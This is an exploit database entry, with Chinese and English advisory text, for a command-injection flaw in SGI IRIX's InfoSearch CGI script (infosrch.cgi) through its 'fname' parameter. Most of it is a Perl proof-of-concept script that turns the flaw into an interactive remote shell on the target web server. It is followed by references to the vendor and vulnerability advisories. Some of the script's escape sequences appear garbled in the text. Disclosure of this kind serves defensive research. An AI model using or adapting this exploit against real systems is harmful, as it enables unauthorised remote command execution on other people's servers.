https://www.exploit-db.com/exploits/19788
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-001

InfoSearch是SGIIRIX操作系统所带的CGI程序，用来查看在线图书，man页和发布消息。软件包中的infosrch.cgi脚本实现上存在输入验证漏洞，远程攻击者可能利用此漏洞对在Web进程的权限在主机上执行任意命令。infosrch.cgi脚本在将’fname’变量的传送给man2html程序前，它没有正确检查参数内容，远程攻击者可以在输入中混入SHELL转义字符比如”;”从而在主机上执行任意命令。

source: http://www.securityfocus.com/bid/1031/info

The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users.


#!/usr/bin/perl -w
# infosearch.cgi interactive shell. 
# usage: ./infosh.pl hostname
# 3/4/00
# --rpc <[email protected]>

use IO::Socket;
use CGI ":escape";
$|++;

die "usage: $0 hostn" unless(@ARGV == 1);
($host) = shift @ARGV;

$cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";

# url encode and send a command.
sub send_cmd
{
	my($url_command) = $cgi . CGI::escape(shift);
	$s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
	if(!$s) { die "denied.n"; }	
	print $s "GET $url_command HTTP/1.0rn";
	print $s "User-Agent: rnrn";
	@result = <$s>;
	shift @result until $result[0] =~ /^rn/; # uninteresting data. 
	shift @result; $#result--;		
return @result;
}

# draw a pseudo prompt. i like "h:w $ ".
sub prompt
{
	@res = send_cmd("/sbin/pwd");	
	chomp($pwd = $res[0]);
	print "$host:", $pwd, "$ ";
}

prompt;
while(!eof(STDIN)) {
	chomp($cmd = <STDIN>);
	print send_cmd($cmd);
	prompt;
}

来源:BID
名称:1031
链接:http://www.securityfocus.com/bid/1031
来源:SGI
名称:20000501-01-P
链接:ftp://patches.sgi.com/support/free/security/advisories/20000501-01-P
来源：NSFOCUS
名称：361
链接：http://www.nsfocus.net/vulndb/361